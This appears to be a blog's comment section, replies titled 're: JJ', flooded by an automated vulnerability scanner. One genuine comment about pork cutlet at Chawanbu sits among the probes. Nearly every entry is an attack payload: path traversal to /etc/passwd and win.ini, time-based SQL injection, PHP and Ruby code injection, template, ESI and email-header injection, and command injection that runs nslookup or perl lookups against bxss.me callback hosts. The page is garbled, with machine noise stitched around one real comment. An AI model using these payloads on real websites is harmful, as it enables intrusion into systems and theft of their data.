/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: JJ
`(nslookup hitevdnyzdxxx3642a.bxss.me||perl -e "gethostbyname('hitevdnyzdxxx3642a.bxss.me')")`
re: JJ
file:///etc/passwd
re: JJ
;(nslookup hitbqmjfipzvmdc3f9.bxss.me||perl -e "gethostbyname('hitbqmjfipzvmdc3f9.bxss.me')")|(nslookup hitbqmjfipzvmdc3f9.bxss.me||perl -e "gethostbyname('hitbqmjfipzvmdc3f9.bxss.me')")&(nslookup hitbqmjfipzvmdc3f9.bxss.me||perl -e "gethostbyname('hitbqmjfipzvmdc3f9.bxss.me')")
re: JJ
/\../\../\../\../\../\../\../etc/passwd
re: JJ
/WEB-INF/web.xml
re: JJ
C:\WINDOWS\system32\drivers\etc\hosts
re: JJ
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: JJ
../../../../../../../../../../windows/win.ini%00.jpg
re: JJ
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: JJ
/../../../../../../../../../../boot.ini
re: JJ
Http://bxss.me/t/fit.txt
re: JJ
'.gethostbyname(lc('hitnt'.'mwvqflgr0e4b4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(74).chr(99).chr(67).'
re: JJ
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: JJ
http://bxss.me/t/fit.txt%3F.jpg
re: JJ
".gethostbyname(lc("hitav"."mscwdwyoe98ad.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(87).chr(100).chr(68)."
re: JJ
..\..\..\..\..\..\..\..\windows\win.ini
re: JJ
/etc/shells
re: JJ
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: JJ
c:/windows/win.ini
re: JJ
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: JJ
bxss.me
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: JJ
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: JJ
WEB-INF/web.xml
re: JJ
HttP://bxss.me/t/xss.html?%00
re: JJ
WEB-INF\web.xml
re: JJ
"+"A".concat(70-3).concat(22*4).concat(102).concat(89).concat(122).concat(89)+(require"socket"
Socket.gethostbyname("hitrv"+"sbaozxxbc993e.bxss.me.")[3].to_s)+"
re: JJ
bxss.me/t/xss.html?%00
re: JJ
'+'A'.concat(70-3).concat(22*4).concat(98).concat(75).concat(110).concat(74)+(require'socket'
Socket.gethostbyname('hitnz'+'kskbptjee5a7a.bxss.me.')[3].to_s)+'
re: JJ
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: JJ
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: JJ
'"
re: JJ
';print(md5(31337));$a='
re: JJ
<!--
re: JJ
";print(md5(31337));$a="
re: JJ
${@print(md5(31337))}
re: JJ
${@print(md5(31337))}\
re: JJ
'.print(md5(31337)).'
re: JJ
1
re: JJ
1
re: JJ
-1 OR 2+620-620-1=0+0+0+1 --
re: JJ
-1 OR 3+620-620-1=0+0+0+1 --
re: JJ
-1 OR 2+437-437-1=0+0+0+1
re: JJ
-1 OR 3+437-437-1=0+0+0+1
re: JJ
-1' OR 2+319-319-1=0+0+0+1 --
re: JJ
-1' OR 3+319-319-1=0+0+0+1 --
re: JJ
-1' OR 2+767-767-1=0+0+0+1 or '8LqSIfkj'='
re: JJ
-1' OR 3+767-767-1=0+0+0+1 or '8LqSIfkj'='
re: JJ
-1" OR 2+149-149-1=0+0+0+1 --
re: JJ
-1" OR 3+149-149-1=0+0+0+1 --
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
643ly04V'; waitfor delay '0:0:15' --
re: JJ
-5 OR 646=(SELECT 646 FROM PG_SLEEP(15))--
re: JJ
-5) OR 955=(SELECT 955 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 890=(SELECT 890 FROM PG_SLEEP(15))--
re: JJ
gseJAjD4' OR 478=(SELECT 478 FROM PG_SLEEP(15))--
re: JJ
xKJNSGpF') OR 833=(SELECT 833 FROM PG_SLEEP(15))--
re: JJ
IgzX20Js')) OR 12=(SELECT 12 FROM PG_SLEEP(15))--
re: JJ
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@wEaq3
re: JJ
1
re: JJ
1
re: JJ
1
Photo of the hire at Chawanbu, for reference. The batter is fried in a light style, and the hire is served very pink. Note that unlike the hire, Chawanbu cooks their rosu much more thoroughly (medium well, bordering on well-done). So if you prefer the texture of medium pork, then hire is the way to go at Chawanbu.
re: JJ
tJlvJ0XF
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
-1 OR 2+195-195-1=0+0+0+1
re: JJ
-1 OR 3+195-195-1=0+0+0+1
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
QRvjW8HI'; waitfor delay '0:0:15' --
re: JJ
-5 OR 506=(SELECT 506 FROM PG_SLEEP(15))--
re: JJ
-5) OR 285=(SELECT 285 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 329=(SELECT 329 FROM PG_SLEEP(15))--
re: JJ
jjTopyYG' OR 810=(SELECT 810 FROM PG_SLEEP(15))--
re: JJ
0tgJZqKX') OR 373=(SELECT 373 FROM PG_SLEEP(15))--
re: JJ
WqC7QFer')) OR 650=(SELECT 650 FROM PG_SLEEP(15))--
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@lTyuM
re: JJ
e32PFXPG
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
-1 OR 2+21-21-1=0+0+0+1
re: JJ
-1 OR 3+21-21-1=0+0+0+1
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
RO0Yqwss'; waitfor delay '0:0:15' --
re: JJ
-5 OR 119=(SELECT 119 FROM PG_SLEEP(15))--
re: JJ
-5) OR 299=(SELECT 299 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 429=(SELECT 429 FROM PG_SLEEP(15))--
re: JJ
5FWC5nCV' OR 970=(SELECT 970 FROM PG_SLEEP(15))--
re: JJ
b7OYvbf6') OR 333=(SELECT 333 FROM PG_SLEEP(15))--
re: JJ
z3icf7EY')) OR 361=(SELECT 361 FROM PG_SLEEP(15))--
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@lXoFy
re: JJ
1qagSYtAO
re: JJ
response.write(9177807*9797718)
re: JJ
'+response.write(9177807*9797718)+'
re: JJ
"+response.write(9177807*9797718)+"
re: JJ
%0abcc:074625.67-10161.67.3225d.19990.2@bxss.me
re: JJ
to@example.com>%0d%0abcc:074625.67-10162.67.3225d.19990.2@bxss.me
re: JJ
<esi:include src="http://bxss.me/rpb.png"/>
re: JJ
${9999682+9999853}
re: JJ
../../../../../../../../../../../../../../etc/passwd
re: JJ
../../../../../../../../../../../../../../windows/win.ini
re: JJ
file:///etc/passwd
re: JJ
../../../../../../../../../../../../../../../proc/version
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: JJ
../../../../../../../../../../etc/passwd%00.jpg
re: JJ
)
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: JJ
echo muuvlc$()\ kyvypa\nz^xyu||a #' &echo muuvlc$()\ kyvypa\nz^xyu||a #|" &echo muuvlc$()\ kyvypa\nz^xyu||a #
re: JJ
!(()&&!|*|*|
re: JJ
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: JJ
^(#$!@#$)(()))******
re: JJ
&echo rjlkyl$()\ astrwe\nz^xyu||a #' &echo rjlkyl$()\ astrwe\nz^xyu||a #|" &echo rjlkyl$()\ astrwe\nz^xyu||a #
re: JJ
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: JJ
|echo xbwxmq$()\ dietrt\nz^xyu||a #' |echo xbwxmq$()\ dietrt\nz^xyu||a #|" |echo xbwxmq$()\ dietrt\nz^xyu||a #
re: JJ
/etc/passwd
re: JJ
(nslookup hitdqxatxxpkg1aca0.bxss.me||perl -e "gethostbyname('hitdqxatxxpkg1aca0.bxss.me')")
re: JJ
%2fetc%2fpasswd
re: JJ
$(nslookup hitrqwurjtjudee8ab.bxss.me||perl -e "gethostbyname('hitrqwurjtjudee8ab.bxss.me')")
re: JJ
/.././.././.././.././.././.././.././../etc/./passwd%00
re: JJ
&nslookup hitzovbervusq1d86f.bxss.me&'\"`0&nslookup hitzovbervusq1d86f.bxss.me&`'
re: JJ
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: JJ
'.gethostbyname(lc('hitbk'.'audyjmkfd98b0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(87).chr(111).chr(74).'
re: JJ
&(nslookup hitdryudatudf886c6.bxss.me||perl -e "gethostbyname('hitdryudatudf886c6.bxss.me')")&'\"`0&(nslookup hitdryudatudf886c6.bxss.me||perl -e "gethostbyname('hitdryudatudf886c6.bxss.me')")&`'
re: JJ
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: JJ
|(nslookup hitxcjwdgathy31753.bxss.me||perl -e "gethostbyname('hitxcjwdgathy31753.bxss.me')")
re: JJ
".gethostbyname(lc("hitwd"."gypudapuead5d.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(89).chr(113).chr(72)."
re: JJ
Http://bxss.me/t/fit.txt
re: JJ
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: JJ
`(nslookup hitebgrdamogdda52e.bxss.me||perl -e "gethostbyname('hitebgrdamogdda52e.bxss.me')")`
re: JJ
http://bxss.me/t/fit.txt%3F.jpg
re: JJ
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: JJ
;(nslookup hitdzgmzrkorh11886.bxss.me||perl -e "gethostbyname('hitdzgmzrkorh11886.bxss.me')")|(nslookup hitdzgmzrkorh11886.bxss.me||perl -e "gethostbyname('hitdzgmzrkorh11886.bxss.me')")&(nslookup hitdzgmzrkorh11886.bxss.me||perl -e "gethostbyname('hitdzgmzrkorh11886.bxss.me')")
re: JJ
/etc/shells
re: JJ
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: JJ
c:/windows/win.ini
re: JJ
file:///etc/passwd
re: JJ
bxss.me
re: JJ
/\../\../\../\../\../\../\../etc/passwd
re: JJ
/WEB-INF/web.xml
re: JJ
C:\WINDOWS\system32\drivers\etc\hosts
re: JJ
HttP://bxss.me/t/xss.html?%00
re: JJ
"+"A".concat(70-3).concat(22*4).concat(107).concat(79).concat(106).concat(72)+(require"socket"
Socket.gethostbyname("hitpj"+"rikykksm2ac14.bxss.me.")[3].to_s)+"
re: JJ
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: JJ
../../../../../../../../../../windows/win.ini%00.jpg
re: JJ
bxss.me/t/xss.html?%00
re: JJ
'+'A'.concat(70-3).concat(22*4).concat(101).concat(66).concat(110).concat(82)+(require'socket'
Socket.gethostbyname('hitvk'+'wdxwbmjlc6371.bxss.me.')[3].to_s)+'
re: JJ
';print(md5(31337));$a='
re: JJ
/../../../../../../../../../../boot.ini
re: JJ
";print(md5(31337));$a="
re: JJ
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: JJ
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: JJ
${@print(md5(31337))}
re: JJ
..\..\..\..\..\..\..\..\windows\win.ini
re: JJ
${@print(md5(31337))}\
re: JJ
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: JJ
'.print(md5(31337)).'
re: JJ
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: JJ
'"
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: JJ
<!--
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: JJ
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\